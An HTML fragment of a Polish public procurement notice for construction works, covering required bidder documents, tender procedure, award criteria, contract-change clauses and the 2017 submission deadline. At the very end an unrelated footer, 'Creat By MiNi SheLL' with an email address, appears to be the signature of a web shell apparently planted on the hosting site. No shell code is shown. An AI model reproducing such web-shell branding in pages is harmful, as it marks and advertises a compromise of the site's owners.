                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">Oświadczenie wykonawcy o przynależności albo braku przynależności do tej samej grupy kapitałowej o której mowa w art. 24 ust 1 pkt 23 Pzp - (według wzoru który Zamawiający udostępni wraz z informacją z otwarcia ofert)
W przypadku przynależności do tej samej grupy kapitałowej wykonawca może złożyć wraz z oświadczeniem dokumenty bądź informacje potwierdzające, że powiazania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu (według wzoru który Zamawiający udostępni wraz z informacją z otwarcia ofert.

</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1.	wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich rodzaju, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, (określonych w pkt III.1.3 a)ogłoszenia z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów  inne dokumenty;
2.	wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich uprawnień niezbędnych do wykonania zamówienia publicznego (określonych w pkt. III1.3 b) ogłoszenia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1.	Wypełniony i podpisany druk OFERTA,
2.	Wypełniony i podpisany kosztorys ofertowy. Kosztorys ofertowy w wersji uproszczonej dla każdej ulicy oddzielnie.
3.	Oświadczenie o oferowanym okresie rękojmi zawarte w druku oferta 
4. pełnomocnictwa  jeśli wymagane do reprezentowania Wykonawcy/ów w przypadku, gdy: 
a) Wykonawcę reprezentuje pełnomocnik, 
b) ofertę składają Wykonawcy ubiegający się wspólnie o udzielenie zamówienia publicznego o treści wymaganej w art. 23 ust. 2 Pzp (dotyczy również wspólników spółki cywilnej). Pełnomocnictwo winno być złożone w oryginale (forma pisemna) lub kopii poświadczonej przez notariusza.
5. Zobowiązanie innego podmiotu do oddania do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia, o ile Wykonawcy powołują się na zasoby innych podmiotów, zgodnie z art. 22a Pzp.

</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>okres rękojmi za wady</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />ZMIANA POSTANOWIEŃ UMOWY
1.	Strony mogą dokonywać istotnych zmian postanowień zawartej umowy w stosunku do treści oferty w przypadkach i na warunkach przewidzianych w przepisach prawa i w niniejszej umowie.
2.	Wszelkie zmiany umowy wymagają formy pisemnej (aneks do umowy) pod rygorem nieważności, chyba że umowa stanowi inaczej.
3.	Termin realizacji zamówienia może być zmieniony w przypadku, gdy opóźnienie w wykonaniu przedmiotu umowy spowodowane będzie okolicznością, która wystąpiła z przyczyn niezależnych od Wykonawcy po zawarciu umowy:
1)	gdy zajdzie konieczność wykonania jakichkolwiek robót nieprzewidzianych, które będą niezbędne do prawidłowego wykonania i zakończenia robót objętych umową podstawową, 
2)	wystąpienie warunków pogodowych mających wpływ na niemożliwość prowadzenia robót budowlanych jak: opady trwające powyżej 3 dni, powódź (czas niezbędny na ustąpienie wody z zalanego terenu i możliwość kontynuacji lub rozpoczęcia robót), wczesny okres zimowy, opady śniegu, niskie temperatury, które zgodnie z SST uniemożliwiają prowadzenie robót,
3)	wstrzymania robót spowodowanego wykryciem na przykład przedmiotów niebezpiecznych, szczątków ludzkich, zabytków, pozostałości budowli podziemnych, 
4)	wystąpienia niezgodności map geodezyjnych ze stanem faktycznym, które spowodują przerwę w pracach,
5)	wstrzymania robót budowlanych przez organy administracji publicznej,
6)	protesty co do wykonania robót, składane przez użytkowników nieruchomości, na których prowadzone są roboty i sąsiadujących z terenem robót.
4.	Zamawiający dopuszcza zmiany postanowień umowy w stosunku do treści oferty w zakresie zwiększenia wynagrodzenia Wykonawcy (o ile jest to wynagrodzenie kosztorysowe), jeżeli po dokonaniu rozliczenia końcowego okaże się, że Wykonawca, za zgodą Zamawiającego, wykonał roboty niewykraczające poza przedmiot zamówienia, w większej ilości niż określono w przedmiarach robót, zgodnie z definicją wynagrodzenia kosztorysowego. Wykonanie robót, o których mowa, wymaga zgody Zamawiającego i zabezpieczenia środków. Wykonawca powinien zgłosić ilość robót, najpóźniej w dniu ich zakończenia, zgodnie z umową.
5.	Zamawiający dopuszcza możliwość zmiany zakresu rzeczowego zamówienia poprzez zaniechanie niektórych robót, wraz ze zmianą wysokości wynagrodzenia, gdy w trakcie realizacji umowy wystąpią okoliczności powodujące, że niecelowe będzie wykonanie pełnego zakresu robót. W razie całkowitego zaniechania robót danego rodzaju wynagrodzenie Wykonawcy jest pomniejszane o kwotę przewidzianą w kosztorysie ofertowym za te roboty. W razie częściowego zaniechania robót danego rodzaju rozliczenie następuje na podstawie obmiaru rzeczywiście wykonanych robót danego elementu, który to obmiar potwierdzony będzie przez Wykonawcę robót, inspektora nadzoru 
i Zamawiającego.
6.	W przypadku gdy umowa zawarta jest na okres dłuższy niż 12 miesięcy przewiduje się możliwość wprowadzenia odpowiednich zmian wysokości wynagrodzenia należnego Wykonawcy, w przypadku zmiany:
1)	wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie przepisów o minimalnym wynagrodzeniu za pracę,
2)	zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawek składek na ubezpieczenia społeczne lub zdrowotne
 jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia publicznego przez wykonawcę. Obowiązek udowodnienia tego wpływu, w tym przedstawienia szczegółowych kalkulacji, spoczywa na Wykonawcy.
7.	Zamawiający dopuszcza zmianę wartości i zakresu wykonanych robót w poszczególnych latach realizacji umowy w przypadku zwiększenia środków finansowych w pierwszym roku bądź w kolejnych latach  realizacji umowy, a także zmniejszenie wartości i zakresu robót w poszczególnych latach realizacji umowy w przypadku wystąpienia okoliczności, o których mowa w ust. 3.
8.	Jeżeli umowa przewiduje jednorazową płatność po wykonaniu całości przedmiotu umowy w  jednym roku budżetowym, a wskutek zmiany terminu w okolicznościach przewidzianych w ust. 3, wykonanie umowy nastąpi w kolejnym roku budżetowym, możliwa jest zmiana umowy poprzez wprowadzenie płatności częściowych (odpowiadających wartości wykonanych robót), jeśli u Zamawiającego wystąpi potrzeba wydatkowania w pierwszym roku budżetowym środków przewidzianych w planie finansowym.
9.	Dopuszcza się skrócenie terminu płatności faktury końcowej w przypadku zmiany terminu wykonania umowy, w celu dokonania wydatku w roku budżetowym, w którym wydatek jest zaplanowany.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br />Zamawiający nie zastrzega poufności informacji, udostępnianych w toku postępowania o udzielenie zamówienia.<br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 10/05/2017, godzina: 11:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              ofertę należy złożyć w języku polskim<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com